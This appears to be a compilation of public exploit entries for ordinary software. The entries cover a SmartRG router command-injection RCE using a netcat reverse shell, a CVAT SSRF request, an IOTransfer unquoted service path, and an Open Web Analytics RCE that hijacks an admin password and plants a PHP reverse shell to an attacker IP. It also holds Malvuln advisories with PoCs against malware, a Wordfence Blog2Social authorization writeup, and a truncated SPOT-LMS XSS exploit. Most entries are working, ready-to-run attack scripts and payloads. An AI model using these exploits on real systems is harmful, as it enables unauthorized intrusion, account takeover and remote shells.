<pre><code># Exploit Title: SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)<br /># Date: 13/06/2022<br /># Exploit Author: Yerodin Richards<br /># Vendor Homepage: https://adtran.com<br /># Version: 2.5.15 / 2.6.13 (confirmed)<br /># Tested on: SR506n (2.5.15) & SR510n (2.6.13)<br /># CVE : CVE-2022-37661<br /><br />import requests<br />from subprocess import Popen, PIPE<br /><br />router_host =3D "http://192.168.1.1"<br />authorization_header =3D "YWRtaW46QWRtMW5ATDFtMyM=3D"<br /><br />lhost =3D "lo"<br />lport =3D 80<br /><br />payload_port =3D 81<br /><br /><br />def main():<br /> e_proc =3D Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tm=<br />p/s | nc {lhost} {lport} > /tmp/s"], stdout=3DPIPE)<br /> Popen(["nc", "-nlvp", f"{payload_port}"], stdin=3De_proc.stdout)<br /> send_payload(f"|nc {lhost} {payload_port}|sh")<br /> print("done.. check shell")<br /><br /><br />def get_session():<br /> url =3D router_host + "/admin/ping.html"<br /> headers =3D {"Authorization": "Basic {}".format(authorization_header)}<br /> r =3D requests.get(url, headers=3Dheaders).text<br /> i =3D r.find("&sessionKey=3D") + len("&sessionKey=3D")<br /> s =3D ""<br /> while r[i] !=3D "'":<br /> s =3D s + r[i]<br /> i =3D i + 1<br /> return s<br /><br /><br />def send_payload(payload):<br /> print(payload)<br /> url =3D router_host + "/admin/pingHost.cmd"<br /> headers =3D {"Authorization": "Basic {}".format(authorization_header)}<br /> params =3D {"action": "add", "targetHostAddress": payload, "sessionKey"=<br />: get_session()}<br /> requests.get(url, headers=3Dheaders, params=3Dparams).text<br /><br /><br />main()<br /> <br /></code></pre>
<pre><code>#Exploit Title: CVAT 2.0 - SSRF (Server Side Request Forgery)<br />#Exploit Author: Emir Polat<br />#Vendor Homepage: https://github.com/opencv/cvat<br />#Version: < 2.0.0<br />#Tested On: Version 1.7.0 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)<br />#CVE: CVE-2022-31188<br /><br /># Description:<br />#CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability. <br />#Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade.<br /><br />POST /api/v1/tasks/2/data HTTP/1.1<br />Host: localhost:8080<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0<br />Accept: application/json, text/plain, */*<br />Accept-Language:en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Authorization: Token 06d88f739a10c7533991d8010761df721b790b7<br />X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGV<br />Content-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436<br />Content-Length: 569<br />Origin: http://localhost:8080<br />Connection: close<br />Referer:http://localhost:8080/tasks/create<br />Cookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dned<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------251652214142138553464236533436<br />Content-Disposition: form-data; name="remote files[0]"<br /><br />http://localhost:8081<br />-----------------------------251652214142138553464236533436<br />Content-Disposition: form-data; name=" image quality"<br /><br />170<br />-----------------------------251652214142138553464236533436<br />Content-Disposition: form-data; name="use zip chunks"<br /><br />true<br />-----------------------------251652214142138553464236533436<br />Content-Disposition: form-data; name="use cache"<br /><br />true<br />-----------------------------251652214142138553464236533436--<br /><br /></code></pre>
<pre><code># Exploit Title: IOTransfer V4 - Unquoted Service Path<br /># Exploit Author: BLAY ABU SAFIAN (Inveteck Global)<br /># Discovery Date: 2022-28-07<br /># Vendor Homepage: http://www.iobit.com/en/index.php<br /># Software Link: https://iotransfer.itopvpn.com/download/<br /># Tested Version: V4<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Microsoft Windows Server 2019 Standard Evaluation CVE-2022-37197<br /># Step to discover Unquoted Service Path:<br /><br />C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """<br /><br />IOTransfer Updater IOTUpdaterSvc C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe<br /> Auto<br /><br />C:\>sc qc IOTUpdaterSvc<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: IOTUpdaterSvc<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\IOTransfer\Updater\IOTUpdater.exe<br /><br /><br />LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : IOTransfer Updater<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\>systeminfo<br /><br />OS Name: Microsoft Windows Server 2019 Standard Evaluation<br />OS Version: 10.0.17763 N/A Build 17763<br />OS Manufacturer: Microsoft Corporation<br /><br /></code></pre>
<pre><code># Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE)<br /># Date: 2022-08-30<br /># Exploit Author: Jacob Ebben<br /># Vendor Homepage: https://www.openwebanalytics.com/<br /># Software Link: https://github.com/Open-Web-Analytics<br /># Version: <1.7.4<br /># Tested on: Linux <br /># CVE : CVE-2022-24637<br /><br />import argparse<br />import requests<br />import base64<br />import re<br />import random<br />import string<br />import hashlib<br />from termcolor import colored<br /><br />def print_message(message, type):<br /> if type == 'SUCCESS':<br /> print('[' + colored('SUCCESS', 'green') + '] ' + message)<br /> elif type == 'INFO':<br /> print('[' + colored('INFO', 'blue') + '] ' + message)<br /> elif type == 'WARNING':<br /> print('[' + colored('WARNING', 'yellow') + '] ' + message)<br /> elif type == 'ALERT':<br /> print('[' + colored('ALERT', 'yellow') + '] ' + message)<br /> elif type == 'ERROR':<br /> print('[' + colored('ERROR', 'red') + '] ' + message)<br /><br />def get_normalized_url(url):<br /> if url[-1] != '/':<br /> url += '/'<br /> if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':<br /> url = "http://" + url<br /> return url<br /><br />def get_proxy_protocol(url):<br /> if url[0:8].lower() == 'https://':<br /> return 'https'<br /> return 'http'<br /><br />def get_random_string(length):<br /> chars = string.ascii_letters + string.digits<br /> return ''.join(random.choice(chars) for i in range(length))<br /><br />def get_cache_content(cache_raw):<br /> regex_cache_base64 = r'\*(\w*)\*'<br /> regex_result = re.search(regex_cache_base64, cache_raw)<br /> if not regex_result:<br /> print_message('The provided URL does not appear to be vulnerable ...', "ERROR")<br /> exit()<br /> else:<br /> cache_base64 = regex_result.group(1)<br /> return base64.b64decode(cache_base64).decode("ascii")<br /><br />def get_cache_username(cache):<br /> regex_cache_username = r'"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"'<br /> return re.search(regex_cache_username, cache).group(1)<br /><br />def get_cache_temppass(cache):<br /> regex_cache_temppass = r'"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"'<br /> return re.search(regex_cache_temppass, cache).group(1)<br /><br />def get_update_nonce(url):<br /> try:<br /> update_nonce_request = session.get(url, proxies=proxies)<br /> regex_update_nonce = r'owa_nonce" value="(\w*)"'<br /> update_nonce = re.search(regex_update_nonce, update_nonce_request.text).group(1)<br /> except Exception as e:<br /> print_message('An error occurred when attempting to update config!', "ERROR")<br /> print(e)<br /> exit()<br /> else:<br /> return update_nonce<br /><br />parser = argparse.ArgumentParser(description='Exploit for CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA)')<br />parser.add_argument('TARGET', type=str, <br /> help='Target URL (Example: http://localhost/owa/ or https://victim.xyz:8000/)')<br />parser.add_argument('ATTACKER_IP', type=str, <br /> help='Address for reverse shell listener on attacking machine')<br />parser.add_argument('ATTACKER_PORT', type=str, <br /> help='Port for reverse shell listener on attacking machine')<br />parser.add_argument('-u', '--username', default="admin", type=str,<br /> help='The username to exploit (Default: admin)')<br />parser.add_argument('-p','--password', default=get_random_string(32), type=str,<br /> help='The new password for the exploited user')<br />parser.add_argument('-P','--proxy', type=str,<br /> help='HTTP proxy address (Example: http://127.0.0.1:8080/)')<br />parser.add_argument('-c', '--check', action='store_true',<br /> help='Check vulnerability without exploitation')<br /><br />args = parser.parse_args()<br /><br />base_url = get_normalized_url(args.TARGET)<br />login_url = base_url + "index.php?owa_do=base.loginForm"<br />password_reset_url = base_url + "index.php?owa_do=base.usersPasswordEntry"<br />update_config_url = base_url + "index.php?owa_do=base.optionsGeneral"<br /><br />username = args.username<br />new_password = args.password<br /><br />reverse_shell = '<?php $sock=fsockopen("' + args.ATTACKER_IP + '",'+ args.ATTACKER_PORT + ');$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'<br />shell_filename = get_random_string(8) + '.php'<br />shell_url = base_url + 'owa-data/caches/' + shell_filename<br /><br />if args.proxy:<br /> proxy_url = get_normalized_url(args.proxy)<br /> proxy_protocol = get_proxy_protocol(proxy_url)<br /> proxies = { proxy_protocol: proxy_url }<br />else:<br /> proxies = {}<br /><br />session = requests.Session()<br /><br />try:<br /> mainpage_request = session.get(base_url, proxies=proxies)<br />except Exception as e:<br /> print_message('Could not connect to "' + base_url, "ERROR")<br /> exit()<br />else:<br /> print_message('Connected to "' + base_url + '" successfully!', "SUCCESS")<br /><br />if 'Open Web Analytics' not in mainpage_request.text:<br /> print_message('Could not confirm whether this website is hosting OWA! Continuing exploitation...', "WARNING")<br />elif 'version=1.7.3' not in mainpage_request.text:<br /> print_message('Could not confirm whether this OWA instance is vulnerable! Continuing exploitation...', "WARNING")<br />else:<br /> print_message('The webserver indicates a vulnerable version!', "ALERT")<br /><br />try:<br /> data = {<br /> "owa_user_id": username, <br /> "owa_password": username, <br /> "owa_action": "base.login"<br /> }<br /> session.post(login_url, data=data, proxies=proxies)<br />except Exception as e:<br /> print_message('An error occurred during the login attempt!', "ERROR")<br /> print(e)<br /> exit()<br />else:<br /> print_message('Attempting to generate cache for "' + username + '" user', "INFO")<br /><br />print_message('Attempting to find cache of "' + username + '" user', "INFO")<br /><br />found = False<br /><br />for key in range(100):<br /> user_id = 'user_id' + str(key)<br /> userid_hash = hashlib.md5(user_id.encode()).hexdigest() <br /> filename = userid_hash + '.php'<br /> cache_url = base_url + "owa-data/caches/" + str(key) + "/owa_user/" + filename<br /> cache_request = requests.get(cache_url, proxies=proxies)<br /> if cache_request.status_code != 200:<br /> continue;<br /> cache_raw = cache_request.text<br /> cache = get_cache_content(cache_raw)<br /> cache_username = get_cache_username(cache)<br /> if cache_username != username:<br /> print_message('The temporary password for a different user was found. "' + cache_username + '": ' + get_cache_temppass(cache), "INFO")<br /> continue;<br /> else:<br /> found = True<br /> break<br />if not found:<br /> print_message('No cache found. Are you sure "' + username + '" is a valid user?', "ERROR")<br /> exit()<br /><br />cache_temppass = get_cache_temppass(cache)<br />print_message('Found temporary password for user "' + username + '": ' + cache_temppass, "INFO")<br /><br />if args.check:<br /> print_message('The system appears to be vulnerable!', "ALERT")<br /> exit()<br /><br />try:<br /> data = {<br /> "owa_password": new_password, <br /> "owa_password2": new_password, <br /> "owa_k": cache_temppass, <br /> "owa_action": <br /> "base.usersChangePassword"<br /> }<br /> session.post(password_reset_url, data=data, proxies=proxies)<br />except Exception as e:<br /> print_message('An error occurred when changing the user password!', "ERROR")<br /> print(e)<br /> exit()<br />else:<br /> print_message('Changed the password of "' + username + '" to "' + new_password + '"', "INFO")<br /><br />try:<br /> data = {<br /> "owa_user_id": username, <br /> "owa_password": new_password, <br /> "owa_action": "base.login"<br /> }<br /> session.post(login_url, data=data, proxies=proxies)<br />except Exception as e:<br /> print_message('An error occurred during the login attempt!', "ERROR")<br /> print(e)<br /> exit()<br />else:<br /> print_message('Logged in as "' + username + '" user', "SUCCESS")<br /><br />nonce = get_update_nonce(update_config_url)<br /><br />try:<br /> log_location = "/var/www/html/owa/owa-data/caches/" + shell_filename<br /> data = {<br /> "owa_nonce": nonce, <br /> "owa_action": "base.optionsUpdate", <br /> "owa_config[base.error_log_file]": log_location, <br /> "owa_config[base.error_log_level]": 2<br /> }<br /> session.post(update_config_url, data=data, proxies=proxies)<br />except Exception as e:<br /> print_message('An error occurred when attempting to update config!', "ERROR")<br /> print(e)<br /> exit()<br />else:<br /> print_message('Creating log file', "INFO")<br /><br />nonce = get_update_nonce(update_config_url)<br /><br />try:<br /> data = {<br /> "owa_nonce": nonce, <br /> "owa_action": "base.optionsUpdate", <br /> "owa_config[shell]": reverse_shell <br /> }<br /> session.post(update_config_url, data=data, proxies=proxies)<br />except Exception as e:<br /> print_message('An error occurred when attempting to update config!', "ERROR")<br /> print(e)<br /> exit()<br />else:<br /> print_message('Wrote payload to log file', "INFO")<br /><br />try:<br /> session.get(shell_url, proxies=proxies)<br />except Exception as e:<br /> print(e)<br />else:<br /> print_message('Triggering payload! Check your listener!', "SUCCESS")<br /> print_message('You can trigger the payload again at "' + shell_url + '"' , "INFO")<br /> <br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/2047ac6183da4dfb61d2562721ba0720.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Aphexdoor.LiteSock<br />Vulnerability: Remote Stack Buffer Overflow (SEH)<br />Description: The malware drops an extensionless PE file named "3" which listens on TCP port 1080. Third-party attackers who can reach an infected host can send a specially crafted packet to port 1080, that will trigger a stack buffer overflow overwriting ECX register and SEH.<br />Family: Aphexdoor<br />Type: PE32<br />MD5: 2047ac6183da4dfb61d2562721ba0720<br />Vuln ID: MVID-2022-0653<br />Dropped files: "3"<br />ASLR: False<br />DEP: False<br />CFG: False<br />Safe SEH: False<br />Disclosure: 11/09/2022<br /><br />Memory Dump:<br />(135c.27c8): Access violation - code c0000005 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=41414141 edx=77729d70 esi=02651848 edi=02651d0c<br />eip=7770e916 esp=02651790 ebp=02651830 iopl=0 nv up ei pl nz ac pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216<br />ntdll!ZwQueryInformationProcess+0x26:<br />7770e916 c21400 ret 14h<br /><br />0:004> .ecxr<br />eax=00000000 ebx=00000000 ecx=41414141 edx=77729d70 esi=02651848 edi=02651d0c<br />eip=7770e916 esp=02651790 ebp=02651830 iopl=0 nv up ei pl nz ac pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216<br />ntdll!ZwQueryInformationProcess+0x26:<br />7770e916 c21400 ret 14h<br /><br />0:004> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />*** WARNING: Unable to verify checksum for 3<br />*** ERROR: Module load completed but symbols could not be loaded for 3<br />Failed calling InternetOpenUrl, GLE=12029<br /><br />FAULTING_IP: <br />+26<br />312e312f ?? ???<br /><br />EXCEPTION_RECORD: 0274fadc -- (.exr 0x274fadc)<br />ExceptionAddress: 312e312f<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000000<br /> Parameter[1]: 312e312f<br />Attempt to read from address 312e312f<br /><br />PROCESS_NAME: 3<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_PARAMETER1: 00000001<br /><br />EXCEPTION_PARAMETER2: 02650fe8<br /><br />WRITE_ADDRESS: 02650fe8 <br /><br />FOLLOWUP_IP: <br />+26<br />51bb743d e89efdffff call 51bb71e0<br /><br />FAILED_INSTRUCTION_ADDRESS: <br />+26<br />41414141 ?? ???<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />CONTEXT: 0274fb2c -- (.cxr 0x274fb2c)<br />eax=00000001 ebx=00000234 ecx=72b87bf5 edx=00000001 esi=004011a8 edi=004011a8<br />eip=312e312f esp=0274ff8c ebp=50545448 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202<br />312e312f ?? ???<br />Resetting default scope<br /><br />ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]<br /><br />LAST_CONTROL_TRANSFER: from 203a7473 to 312e312f<br /><br />FAULTING_THREAD: ffffffff<br /><br />DEFAULT_BUCKET_ID: STACKIMMUNE<br /><br />PRIMARY_PROBLEM_CLASS: STACKIMMUNE<br /><br />BUGCHECK_STR: APPLICATION_FAULT_STACKIMMUNE_STACK_OVERFLOW_BAD_INSTRUCTION_PTR_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />IP_ON_HEAP: 203a7473<br />The fault address in not in any loaded module, please check your build's rebase<br />log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may<br />contain the address if it were loaded.<br /><br />IP_IN_FREE_BLOCK: 203a7473<br /><br />FRAME_ONE_INVALID: 1<br /><br />STACK_TEXT: <br />00000000 00000000 3+0x0<br /><br /><br />STACK_COMMAND: .cxr 000000000274FB2C ; kb ; ** Pseudo Context ** ; kb<br /><br />SYMBOL_NAME: 3<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: 3<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 21475346<br /><br />FAILURE_BUCKET_ID: STACKIMMUNE_c0000005_3!Unknown<br /><br />BUCKET_ID: APPLICATION_FAULT_STACKIMMUNE_STACK_OVERFLOW_BAD_INSTRUCTION_PTR_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_3<br /><br />0:004> !exchain<br />0265175c: ntdll!ExecuteHandler2+44 (77729d70)<br />0274ffcc: 41414141<br />Invalid exception stack at 41414141<br /><br /><br />Exploit/PoC:<br />from socket import *<br /><br />MALWARE_HOST="x.x.x.x"<br />PORT=1080<br /><br />s=socket(AF_INET, SOCK_STREAM)<br />s.connect((MALWARE_HOST, PORT))<br /><br />PAYLOAD="TRACE /"+"A"*72+" HTTP/1.1\r\nHost: "+MALWARE_HOST+"\r\n\X-Request-ID: "+"A"*72<br /><br />s.send(PAYLOAD.encode())<br />s.close()<br />print("Aphexdoor.LiteSock Buffer Overflow by Malvuln")<br /><br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/bc2ccf92bea475f828dcdcb1c8f6cc92.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: HEUR:Trojan.MSIL.Agent.gen<br />Vulnerability: Information Disclosure<br />Description: the malware runs an HTTP service on port 19334. Attackers who can reach an infected host can make HTTP GET requests to download and or stat arbitrary files using forced browsing.<br />Family: Agent<br />Type: PE64<br />MD5: bc2ccf92bea475f828dcdcb1c8f6cc92<br />Vuln ID: MVID-2022-0654<br />Disclosure: 11/09/2022<br /><br /><br />Exploit/PoC:<br />C:\>curl "http://192.168.18.125:19334/c:/Windows/system.ini" -v<br /> Trying 192.168.18.125:19334...<br /> Connected to 192.168.18.125 (192.168.18.125) port 19334 (#0)<br /> GET /c:/Windows/system.ini HTTP/1.1<br /> Host: 192.168.18.125:19334<br /> User-Agent: curl/7.83.1<br /> Accept: */*<br /><br />* Mark bundle as not supporting multiuse<br />* HTTP 1.0, assume close after body<br /> HTTP/1.0 200 OK<br /> content-encoding: utf8<br /> content-type: application/octet-stream<br /> date: Tue, 08 Nov 2022 23:11:55 GMT<br /> last-modified: Sat, 16 Jul 2016 07:45:35 GMT<br /> content-disposition: attachment; filename*=UTF-8''system.ini; filename="system.ini"<br /><br />; for 16-bit app support<br />[386Enh]<br />woafont=dosapp.fon<br />EGA80WOA.FON=EGA80WOA.FON<br />EGA40WOA.FON=EGA40WOA.FON<br />CGA80WOA.FON=CGA80WOA.FON<br />CGA40WOA.FON=CGA40WOA.FON<br /><br />[drivers]<br />wave=mmdrv.dll<br />timer=timer.drv<br /><br />[mci]<br />* Closing connection 0<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Description: Missing Authorization to Authenticated (Subscriber+) Settings Update<br /><br />Affected Plugin: Blog2Social<br /><br />Plugin Slug: blog2social<br /><br />Affected Versions: <= 6.9.11<br /><br />CVE ID: CVE-2022-3622<br /><br />CVSS Score: 4.7 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N<br /><br />Researcher/s: Marco Wotschka<br /><br />Fully Patched Version: 6.9.12<br /><br />Blog2Social: Social Media Auto Post & Scheduler is a plugin offered by Blog2Social/Adenion that provides content-creators with the ability to quickly share site content to their social media accounts. It offers automatic post sharing as well as optimized scheduling and also extends some of its features to subscribers, enabling them to share posts to their own social media accounts.<br /><br />As part of the plugin’s functionality, there are some more advanced settings that can be managed. Unfortunately, this was implemented insecurely making it possible for authenticated attackers to update these settings even without the authorization to do so.<br /><br />More specifically, the plugin provides administrators with the ability to enable legacy mode, which is intended to reduce server load. In legacy mode, the plugin will load content one item at a time instead of loading all content in bulk in an attempt to reduce the likelihood of dashboard freeze-ups. In order to reduce the number of concurrent outgoing connections, legacy mode will also load connections to social media accounts in sequential order as opposed to doing so simultaneously. While functionality should not be significantly affected by this for most use cases, this legacy option setting is reserved for administrators only. Unfortunately, due to a lack of capability checking on the function and in the user interface, site subscribers had access to this setting via the dashboard:<br /><br />/wp-admin/admin.php?page=blog2social-settings<br /><br />Furthermore, the same URL offers access to a Social Meta Data tab, which contains forms that are disabled for non-administrative users. However, browsers offer inspector tools, which can be used to modify html on the fly in order to change properties of such forms and their elements. For instance, a save button with the following properties can be modified to become functional by removing the disabled attribute from the button:<br /><br /><button class="btn btn-primary pull-right" disabled="disabled" type="submit">save</button> – as a result, such a form can be submitted by a subscriber. This indicates the developer used client-side validation, which can easily be bypassed by modifying the request sent to the server.<br /><br />A request could be submitted using a third party tool similar to this one:<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br /><br />Host: 127.0.0.1<br /><br />Cookie:<br /><br />b2s_og_default_title=SiteTitle&b2s_og_default_desc=Just%20another%20WordPress%20site&b2s_og_default_image=&b2s_og_imagedata_active=1&b2s_og_objecttype_active=1&b2s_og_locale_active=1&b2s_og_locale=en_US&b2s_card_default_type=Summary&b2s_card_default_title=SiteTitle&b2s_card_default_desc=Just%20another%20WordPress%20site&b2s_card_default_image=&is_admin=1&version=0&action=b2s_save_social_meta_tags&b2s_security_nonce=<nonce><br /><br />This had consequences such as allowing subscribers to change social meta tags which could potentially be used to impact brand reputation.<br /><br />A third issue that we discovered surrounded the plugin’s general authorization mechanism.<br /><br />[Please view this code snippet on our blog here.] (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VWydX-1ZpVtDW5m3pbH5yxlc9W2C4PM94S6TLRN1sYgXV5mNXrV3Zsc37CgPpPW1_8BsQ650vs3W86NLQQ1Cb22gW8qlQJx717QmtN2Cx03MLNfRLW2-JNJb7nLtJDW6WM7R34PtmhMW1Q6y_X7lS_zWVjVDs36QWQxhVzcJwS8zW-6JW8R8sdQ5n8VyMW3xQZRx311bNnW52MK5T99M-WqN2bB3jwTbxZzW1VZPJL4W2QZ5W1sVXxZ2kr-JTTbvjx4xd9hxN1FlKQT1fwwDW7k9F6p6vRy5QVbh2jM4ll2JJW999K9x38XkPRW6ZTcyY2C85K-W5CC1TG1747mhW7gFskm1Y2Zy8W1f8khN7hdTbPVNS67c54W0xjW19nHJ55SGL4QW4BD90m6r6kRYW90HD6J3JT--YW9cg9wz21JSczW3tFWZp50-1qtW8wjp8m8gL9xyW7JNDB-5x1VB83f5z1 )<br /><br />The first if-statement is intended to prevent unauthorized use of this function and similar functions using the same protection. The following parts need to evaluate to true in order for the if-statement to do the same:<br /><br />- current_user_can('read') – This gives access to the administration screens and user profiles. This permission is generally available to all authenticated users such as subscribers.<br />- isset($_POST['b2s_security_nonce']) – this nonce is set by the plugin and can be obtained by searching the code of /wp-admin/profile.php for the string ‘b2s_security_nonce’. This nonce is generated for subscribers and higher.<br />- (int) wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['b2s_security_nonce'])), 'b2s_security_nonce') > 0 – this verifies the nonce after some sanitization.<br /><br />As long as a userId is provided, we are able to lock B2S_LOCK_AUTO_POST_IMPORT_ for any user, resulting in that user being unable to automatically import posts. We found that many other functions lacked proper capability checks as well.<br /><br />The Importance of Capability Checks<br /><br />Capability checks are an important part of securing AJAX actions since those are available to any logged in users, including subscribers. The following is an example of an AJAX action from the Blog2Social plugin.<br /><br />add_action('wp_ajax_b2s_lock_auto_post_import', array($this, 'lockAutoPostImport'));<br /><br />While nonce checks ensure that the user initiating the request intended to do so, they don’t provide authorization. As mentioned above, the check current_user_can('read') does ensure that the user initiating the request has that specific capability, but it does not suffice to protect actions intended for administrators only. A proper way to secure such actions would be to utilize a check such as<br /><br />current_user_can('manage_options').<br /><br />The plugin does make use of B2S_PLUGIN_BLOG_USER_ID, which determines the current user’s ID in order to ensure that options saved are personalized thus preventing overwriting other users’ preferences:<br /><br />define('B2S_PLUGIN_BLOG_USER_ID', get_current_user_id());<br /><br />Timeline<br /><br />October 1, 2022 – Initial outreach to the plugin developer.<br /><br />October 5, 2022 – We disclosed details of the vulnerabilities with the developer.<br /><br />October 6, 2022 – Version 6.9.11 is released which provides a patch for the legacy mode update vulnerability.<br /><br />October 10, 2022 – The remaining authorization vulnerabilities are patched in version 6.9.12.<br /><br />October 27, 2022 – Wordfence Premium, Care, and Response customers receive a firewall rule to provide additional protection.<br /><br />November 26, 2022 – Wordfence Free users receive a firewall rule.<br /><br />Conclusion<br /><br />In today’s post, we covered several vulnerabilities in the Blog2Social: Social Media Auto Post & Scheduler plugin that could be used by subscribers to update plugin settings due to improper authorization checks. The vulnerabilities were patched by ensuring that capabilities were checked.<br /><br />Wordfence Premium, Care, and Response users received a firewall rule on October 27th, 2022 for enhanced protection. Wordfence free users will receive this rule after 30 days on November 26th, 2022. We strongly recommend updating to version 6.9.12 or higher of Blog2Social: Social Media Auto Post & Scheduler to ensure that your site is protected against any exploits targeting this vulnerability.<br /><br />If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance. If you have any friends or colleagues who are using this plugin, please share this announcement with them and encourage them to update to the latest patched version of Blog2Social as soon as possible.<br /><br /></code></pre>
<pre><code>## Title: Forma SPOT-LMS-3.2.1 Cross-site scripting (reflected) RCE - reset mail vulnerability<br />## Author: nu11secur1ty<br />## Date: 11.07.2022<br />## Vendor: https://www.spotlms.us/index_multi.php<br />## The software is applied in the demo account:<br />https://www.spotlms-anca-001.ovh/<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/spotlms.us/2022/SPOT-LMS-Latest<br /><br />## Description:<br />The name of an arbitrarily supplied `URL` parameter from forgetpw.php<br />is copied into the value of an HTML tag attribute which is<br />encapsulated in double quotation marks.<br />The payload qnlxv"><script>alert('hello from<br />nu11secur1ty')</script>sad4r was submitted in the name of an<br />arbitrarily supplied URL parameter.<br />This input was echoed unmodified in the application's response.<br />The attacker can use this vulnerability to crash the cloud system by<br />sending an unlimited password reset request to mail in an already<br />created account on some domain, for example:<br />(www.spotlms-anca-001.ovh).<br /><br />## NOTE:<br />For this test `google` reacted on the twentieth request =) and they<br />block the requests from my exploit, but after some time the attacker<br />can repeat and repeat these steps endlessly :)<br /><br />## STATUS: HIGH Vulnerability<br /><br />[+] Exploit:<br /><br />```POST<br />GET /forgetpw.php/qnlxv"><script>function a() { document.write("<img<br 